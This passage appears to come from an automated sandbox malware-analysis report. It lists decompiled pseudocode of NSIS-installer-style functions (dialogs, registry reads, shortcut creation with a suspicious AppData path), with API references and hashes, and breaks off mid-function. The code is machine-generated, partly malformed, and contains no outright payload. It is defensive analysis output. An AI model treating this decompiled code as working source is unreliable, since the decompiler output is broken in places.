                                                            				E004062EA(_t9, _t31, _t33, 0x414454,  *((intOrPtr*)(_t35 - 0x24)));
                                                            				_t18 = CreateFontIndirectA(0x414438);
                                                            				_push(_t18);
                                                            				_push(_t33);
                                                            				E004061B5();
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t35 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E38
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                            • MulDiv.KERNEL32 ref: 00401E5A
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                            • CreateFontIndirectA.GDI32(00414438), ref: 00401EBA
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction ID: 8ddd809678b75effdda657bd79c7971a8a008a3e86d82937076eaa48eaf57caa
                                                            • Opcode Fuzzy Hash: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction Fuzzy Hash: 8D01B571504240AFE7006BB0EE4ABDD7FF49B95319F14447DF281B71E2CA7804898B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00404B1D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                            				char _v36;
                                                            				char _v68;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t21;
                                                            				signed int _t22;
                                                            				void* _t29;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				void* _t41;
                                                            				signed int _t43;
                                                            				signed int _t47;
                                                            				signed int _t50;
                                                            				signed int _t51;
                                                            				signed int _t53;
                                                            
                                                            				_t21 = _a16;
                                                            				_t51 = _a12;
                                                            				_t41 = 0xffffffdc;
                                                            				if(_t21 == 0) {
                                                            					_push(0x14);
                                                            					_pop(0);
                                                            					_t22 = _t51;
                                                            					if(_t51 < 0x100000) {
                                                            						_push(0xa);
                                                            						_pop(0);
                                                            						_t41 = 0xffffffdd;
                                                            					}
                                                            					if(_t51 < 0x400) {
                                                            						_t41 = 0xffffffde;
                                                            					}
                                                            					if(_t51 < 0xffff3333) {
                                                            						_t50 = 0x14;
                                                            						asm("cdq");
                                                            						_t22 = 1 / _t50 + _t51;
                                                            					}
                                                            					_t23 = _t22 & 0x00ffffff;
                                                            					_t53 = _t22 >> 0;
                                                            					_t43 = 0xa;
                                                            					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                            				} else {
                                                            					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                            					_t47 = 0;
                                                            				}
                                                            				_t29 = E004062EA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                            				_t31 = E004062EA(_t41, _t47, _t53,  &_v68, _t41);
                                                            				_t32 = E004062EA(_t41, _t47, 0x43c090, 0x43c090, _a8);
                                                            				wsprintfA(_t32 + lstrlenA(0x43c090), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                            				return SetDlgItemTextA( *0x44e3f8, _a4, 0x43c090);
                                                            			}




















                                                            APIs
                                                            • lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                            • wsprintfA.USER32 ref: 00404BC3
                                                            • SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction ID: 7c3cbaaa6cddaf4418f9485f50c6cec2219b2b57f28ad8e3923d4dc00c9a2874
                                                            • Opcode Fuzzy Hash: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction Fuzzy Hash: 7811E773A0412867DB00766D9C41FAF3298DB85374F25027BFA26F31D1E978DC1282A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401C2E(intOrPtr __edx) {
                                                            				int _t29;
                                                            				long _t30;
                                                            				signed int _t32;
                                                            				CHAR* _t35;
                                                            				long _t36;
                                                            				int _t41;
                                                            				signed int _t42;
                                                            				int _t46;
                                                            				int _t56;
                                                            				intOrPtr _t57;
                                                            				struct HWND__* _t61;
                                                            				void* _t64;
                                                            
                                                            				_t57 = __edx;
                                                            				_t29 = E00402C17(3);
                                                            				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            				 *(_t64 - 8) = _t29;
                                                            				_t30 = E00402C17(4);
                                                            				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            				 *(_t64 + 8) = _t30;
                                                            				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                            					 *((intOrPtr*)(__ebp - 8)) = E00402C39(0x33);
                                                            				}
                                                            				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                            				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                            					 *(_t64 + 8) = E00402C39(0x44);
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                            				_push(1);
                                                            				if(__eflags != 0) {
                                                            					_t59 = E00402C39();
                                                            					_t32 = E00402C39();
                                                            					asm("sbb ecx, ecx");
                                                            					asm("sbb eax, eax");
                                                            					_t35 =  ~( *_t31) & _t59;
                                                            					__eflags = _t35;
                                                            					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                            					goto L10;
                                                            				} else {
                                                            					_t61 = E00402C17();
                                                            					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            					_t41 = E00402C17(2);
                                                            					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            					_t56 =  *(_t64 - 0x14) >> 2;
                                                            					if(__eflags == 0) {
                                                            						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                            						L10:
                                                            						 *(_t64 - 0xc) = _t36;
                                                            					} else {
                                                            						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                            						asm("sbb eax, eax");
                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                            					}
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                            				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                            					_push( *(_t64 - 0xc));
                                                            					E004061B5();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t64 - 4));
                                                            				return 0;
                                                            			}
















                                                            APIs
                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                            • SendMessageA.USER32 ref: 00401CB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction ID: fb252943c263502b915e172e451356f37a414cf8932e3a565ad31ae7147df210
                                                            • Opcode Fuzzy Hash: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction Fuzzy Hash: E2217371948208BEEB059FB5DA86AAD7FB4EF45304F10447EF101B61D1D7B989819B18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402EA8(intOrPtr _a4) {
                                                            				long _t2;
                                                            				struct HWND__* _t3;
                                                            				struct HWND__* _t6;
                                                            
                                                            				if(_a4 == 0) {
                                                            					if( *0x432048 == 0) {
                                                            						_t2 = GetTickCount();
                                                            						if(_t2 >  *0x45242c) {
                                                            							_t3 = CreateDialogParamA( *0x452420, 0x6f, 0, E00402E25, 0);
                                                            							 *0x432048 = _t3;
                                                            							return ShowWindow(_t3, 5);
                                                            						}
                                                            						return _t2;
                                                            					} else {
                                                            						return E0040669F(0);
                                                            					}
                                                            				} else {
                                                            					_t6 =  *0x432048;
                                                            					if(_t6 != 0) {
                                                            						_t6 = DestroyWindow(_t6);
                                                            					}
                                                            					 *0x432048 = 0;
                                                            					return _t6;
                                                            				}
                                                            			}







                                                            APIs
                                                            • DestroyWindow.USER32 ref: 00402EBB
                                                            • GetTickCount.KERNEL32(00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402ED9
                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F04
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction ID: f2601d1978d4935414455477ceead43ade8f8f36080c659767c01e9f51b987ab
                                                            • Opcode Fuzzy Hash: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction Fuzzy Hash: 12F05E31441A20ABC6216B60FF8C99B7B74A705B12B21583AF105B11F6C6B84889CBEC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E73C31E71(intOrPtr _a4, CHAR* _a8) {
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t19;
                                                            				CHAR* _t21;
                                                            
                                                            				_t11 = _a4;
                                                            				if( *((intOrPtr*)(_t11 + 4)) != 1) {
                                                            					_t21 = _a8;
                                                            					_t13 =  ==  ? 0x73c340c4 : 0x73c340bc;
                                                            					lstrcpyA(_t21,  ==  ? 0x73c340c4 : 0x73c340bc);
                                                            				} else {
                                                            					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
                                                            					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
                                                            						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
                                                            					}
                                                            					_t21 = _a8;
                                                            					wsprintfA(_t21, "callback%d", _t19);
                                                            				}
                                                            				return _t21;
                                                            			}







                                                            APIs
                                                            • wsprintfA.USER32 ref: 73C31EA4
                                                            • lstrcpyA.KERNEL32(?,error,00000818,73C316E5,00000000,?), ref: 73C31EC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcpywsprintf
                                                            • String ID: callback%d$error
                                                            • API String ID: 2408954437-1307476583
                                                            • Opcode ID: a9ea8882235cdac14b0ad8db72a42db29e875cfad6f896bfb94419d908b2102e
                                                            • Instruction ID: 51b039f76c78158c9a71feb0c7501ba25f7d8857f160eb3ae127195c4db30470
                                                            • Opcode Fuzzy Hash: a9ea8882235cdac14b0ad8db72a42db29e875cfad6f896bfb94419d908b2102e
                                                            • Instruction Fuzzy Hash: A7F034313051209FC705EB059948BAA73EAEF86300F4984A8F84ADF241C771AC008B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E00402173() {
                                                            				signed int _t55;
                                                            				void* _t59;
                                                            				intOrPtr* _t63;
                                                            				intOrPtr _t64;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t67;
                                                            				intOrPtr* _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr* _t73;
                                                            				intOrPtr* _t75;
                                                            				intOrPtr* _t78;
                                                            				intOrPtr* _t80;
                                                            				intOrPtr* _t82;
                                                            				intOrPtr* _t84;
                                                            				int _t87;
                                                            				intOrPtr* _t95;
                                                            				signed int _t105;
                                                            				signed int _t109;
                                                            				void* _t111;
                                                            
                                                            				 *(_t111 - 0x38) = E00402C39(0xfffffff0);
                                                            				 *(_t111 - 0xc) = E00402C39(0xffffffdf);
                                                            				 *((intOrPtr*)(_t111 - 0x88)) = E00402C39(2);
                                                            				 *((intOrPtr*)(_t111 - 0x34)) = E00402C39(0xffffffcd);
                                                            				 *((intOrPtr*)(_t111 - 0x78)) = E00402C39(0x45);
                                                            				_t55 =  *(_t111 - 0x18);
                                                            				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                            				_t105 = _t55 & 0x00008000;
                                                            				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                            				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                            				if(E00405C56( *(_t111 - 0xc)) == 0) {
                                                            					E00402C39(0x21);
                                                            				}
                                                            				_t59 = _t111 + 8;
                                                            				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                            				if(_t59 < _t87) {
                                                            					L15:
                                                            					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                            					_push(0xfffffff0);
                                                            				} else {
                                                            					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                            					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                            					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                            					if(_t64 >= _t87) {
                                                            						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                            						if(_t105 == _t87) {
                                                            							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                            							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes");
                                                            						}
                                                            						if(_t109 != _t87) {
                                                            							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                            							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                            						}
                                                            						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                            						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                            						if( *_t95 != _t87) {
                                                            							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                            							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                            						}
                                                            						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                            						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                            						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                            							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                            							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x2000) != 0) {
                                                            								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                            								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                            							}
                                                            						}
                                                            						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                            						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                            					}
                                                            					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                            					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                            					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                            						_push(0xfffffff4);
                                                            					} else {
                                                            						goto L15;
                                                            					}
                                                            				}
                                                            				E00401423();
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t111 - 4));
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?), ref: 004021F8
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00002000,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00402238
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 123533781-4054825685
                                                            • Opcode ID: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction ID: de46d6ec528c0b0c8935217740d64446ab711007b8cbb855df2cc617b58c6e92
                                                            • Opcode Fuzzy Hash: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction Fuzzy Hash: 37511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E00405CD7(void* __eflags, intOrPtr _a4) {
                                                            				int _t11;
                                                            				signed char* _t12;
                                                            				intOrPtr _t18;
                                                            				intOrPtr* _t21;
                                                            				void* _t22;
                                                            
                                                            				E00406257(0x446098, _a4);
                                                            				_t21 = E00405C82(0x446098);
                                                            				if(_t21 != 0) {
                                                            					E00406535(_t21);
                                                            					if(( *0x452438 & 0x00000080) == 0) {
                                                            						L5:
                                                            						_t22 = _t21 - 0x446098;
                                                            						while(1) {
                                                            							_t11 = lstrlenA(0x446098);
                                                            							_push(0x446098);
                                                            							if(_t11 <= _t22) {
                                                            								break;
                                                            							}
                                                            							_t12 = E004065CE();
                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                            								E00405C30(0x446098);
                                                            								continue;
                                                            							} else {
                                                            								goto L1;
                                                            							}
                                                            						}
                                                            						E00405BE9();
                                                            						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                            					}
                                                            					_t18 =  *_t21;
                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                            						goto L1;
                                                            					} else {
                                                            						goto L5;
                                                            					}
                                                            				}
                                                            				L1:
                                                            				return 0;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • lstrlenA.KERNEL32(00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000,0047B000), ref: 00405D2A
                                                            • GetFileAttributesA.KERNEL32(00446098,00446098,00446098,00446098,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 00405D3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: T'Wu
                                                            • API String ID: 3248276644-2377931180
                                                            • Opcode ID: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction ID: ca67251d285f136759c69e236b036a1895e73ffa9f1d75b438997b26ec9dd8f6
                                                            • Opcode Fuzzy Hash: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction Fuzzy Hash: 12F02825108F6526E72632391D09AAF0A45CE93324719453FFCA2B62C2DA3C89429E6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004052EC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                            				int _t15;
                                                            				long _t16;
                                                            
                                                            				_t15 = _a8;
                                                            				if(_t15 != 0x102) {
                                                            					if(_t15 != 0x200) {
                                                            						_t16 = _a16;
                                                            						L7:
                                                            						if(_t15 == 0x419 &&  *0x43c07c != _t16) {
                                                            							_push(_t16);
                                                            							_push(6);
                                                            							 *0x43c07c = _t16;
                                                            							E00404CA7();
                                                            						}
                                                            						L11:
                                                            						return CallWindowProcA( *0x43c084, _a4, _t15, _a12, _t16);
                                                            					}
                                                            					if(IsWindowVisible(_a4) == 0) {
                                                            						L10:
                                                            						_t16 = _a16;
                                                            						goto L11;
                                                            					}
                                                            					_t16 = E00404C27(_a4, 1);
                                                            					_t15 = 0x419;
                                                            					goto L7;
                                                            				}
                                                            				if(_a12 != 0x20) {
                                                            					goto L10;
                                                            				}
                                                            				E00404320(0x413);
                                                            				return 0;
                                                            			}






                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0040531B
                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 0040536C
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction ID: 1a66df526f819bcac04dd73860a054bf484f2535563b1484c434c9e94afb1d49
                                                            • Opcode Fuzzy Hash: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction Fuzzy Hash: 34017C72104608EBEF206F61ED91AAB372AEB84395F145037FE05751D0C7BA8D929F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E0040613E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                            				int _v8;
                                                            				long _t21;
                                                            				long _t24;
                                                            				char* _t30;
                                                            
                                                            				asm("sbb eax, eax");
                                                            				_v8 = 0x2000;
                                                            				_t21 = E004060DD(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                            				_t30 = _a16;
                                                            				if(_t21 != 0) {
                                                            					L4:
                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                            				} else {
                                                            					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                            					_t21 = RegCloseKey(_a20);
                                                            					_t30[0x1fff] = _t30[0x1fff] & 0x00000000;
                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            				return _t21;
                                                            			}








                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Copy failed
                                                            • API String ID: 3356406503-2810831833
                                                            • Opcode ID: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction ID: 5cbf1d77a42ccbfbde14d2bcc727d6f9e9f9e3285794b8b30d10470a11d9e604
                                                            • Opcode Fuzzy Hash: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction Fuzzy Hash: 7501BC32500209ABDF22CF60CC09FDB3FA8EF44360F01803AF916A6192D378C964CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405D4F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                            				int _v8;
                                                            				int _t12;
                                                            				int _t14;
                                                            				int _t15;
                                                            				CHAR* _t17;
                                                            				CHAR* _t27;
                                                            
                                                            				_t12 = lstrlenA(_a8);
                                                            				_t27 = _a4;
                                                            				_v8 = _t12;
                                                            				while(lstrlenA(_t27) >= _v8) {
                                                            					_t14 = _v8;
                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                            					if(_t15 == 0) {
                                                            						_t17 = _t27;
                                                            					} else {
                                                            						_t27 = CharNextA(_t27);
                                                            						continue;
                                                            					}
                                                            					L5:
                                                            					return _t17;
                                                            				}
                                                            				_t17 = 0;
                                                            				goto L5;
                                                            			}










                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D77
                                                            • CharNextA.USER32(00000000), ref: 00405D88
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                            • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:4.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:245
                                                            Total number of Limit Nodes:6

                                                            Callgraph

                                                            C-Code - Quality: 93%
                                                            			E73BC2288() {
                                                            				CHAR* _t236;
                                                            				void* _t238;
                                                            				signed int _t239;
                                                            				char _t240;
                                                            				char _t241;
                                                            				void _t242;
                                                            				CHAR* _t243;
                                                            				void* _t249;
                                                            				struct HINSTANCE__* _t250;
                                                            				CHAR* _t251;
                                                            				int _t252;
                                                            				CHAR* _t253;
                                                            				signed short _t255;
                                                            				CHAR* _t259;
                                                            				void* _t260;
                                                            				CHAR** _t261;
                                                            				intOrPtr _t264;
                                                            				void* _t272;
                                                            				signed int _t273;
                                                            				CHAR* _t274;
                                                            				CHAR* _t276;
                                                            				CHAR* _t279;
                                                            				void* _t281;
                                                            				CHAR* _t282;
                                                            				void _t283;
                                                            				signed int _t287;
                                                            				void* _t288;
                                                            				void* _t291;
                                                            				CHAR* _t298;
                                                            				signed int _t299;
                                                            				CHAR* _t303;
                                                            				CHAR* _t305;
                                                            				CHAR* _t306;
                                                            				CHAR* _t307;
